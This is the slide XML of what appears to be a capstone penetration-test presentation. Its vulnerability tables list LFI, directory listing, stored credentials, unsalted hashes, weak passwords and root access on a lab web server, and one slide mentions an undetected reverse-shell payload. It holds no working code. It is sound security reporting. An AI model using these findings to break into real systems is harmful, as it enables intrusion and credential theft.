                      <a:endParaRPr lang="en-CA" sz="1100" b="0"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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows to send a reverse shell</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>payload on a web server while the</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>firewalls do not detect the payload</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Attackers gained the remote</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>backdoor access to the Capstone</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>web server</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EB48CC80-9D4C-49D2-84C5-A0816E830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Vulnerability Assessment - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Continued)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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mj-lt"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3993106092"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="1095657"/>
          <a:ext cx="8362500" cy="3811090"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EB400C15-705A-4B7E-AC61-6032BE286A16}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2127163">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3061252">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3174085">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CVE-2021-31783</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>m</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>LFI is a vulnerability in poorly designed</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>web applications. This allows users to</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>upload content into the application or</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>servers.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100"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An LFI vulnerability allows an attacker</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>to upload a malicious payload.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="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r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Indexing vulnerability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-548</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CVE-2019-5437</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>n</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" i="0"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r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker can view and download content of a directory located on a vulnerable device. CWE-548 refers to an informational leak through directory listing.</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The attacker can gain access to source code, or devise other exploits. The directory listing can compromise private or confidential data.</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US" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Other user’s credentials found when logging on with different user</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CVE-2020-24227</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="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i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Storing a user name and/or password in plain text that is not encrypted</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Evidence showed that Ashton had Ryan’s name and password hash stored.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This enabled further penetration into the system without extensive social engineering</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CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>Weak Hashed Passwords</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="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i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsalted hashed passwords can be easily cracked with resources (i.e.,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>https://crackstation.net/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>, John the Ripper, etc.) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>u</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="0" dirty="0">
                        <a:latin typeface="+mn-lt"/>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Hackers only need the username and</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>password to compromise an account,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>gaining access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" i="1" dirty="0">
                        <a:latin typeface="+mn-lt"/>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EB48CC80-9D4C-49D2-84C5-A0816E830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128196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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Assessment - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Continued)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230205398"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="1095657"/>
          <a:ext cx="8362500" cy="3494352"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EB400C15-705A-4B7E-AC61-6032BE286A16}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1759215">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2882348">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3720937">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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541102">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Simple Usernames</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i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Short names, first name, or any simple</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>combination.</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Usernames like Ashton, Ryan, and Hannah are all simple usernames that can be easily obtained.</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CA" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Passwords</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mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Short, common, simple, or noncomplex</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>passwords.</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Weak passwords can be easily</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>cracked by computers in seconds. Website: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://howsecureismypassword.net/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> shows the password (i.e., “leopoldo can be cracked in 5</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>seconds by a computer.) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" i="0" dirty="0">
                          <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0">
                        <a:latin typeface="+mn-lt"/>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r>
                        <a:rPr lang="en-CA" sz="1100" b="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Root Access</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dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privileged access to resources and</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ability to perform administrative</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>functions on a machine.</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Vulnerabilities can be leveraged. Extensive potential Impact to any connected network. </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r>
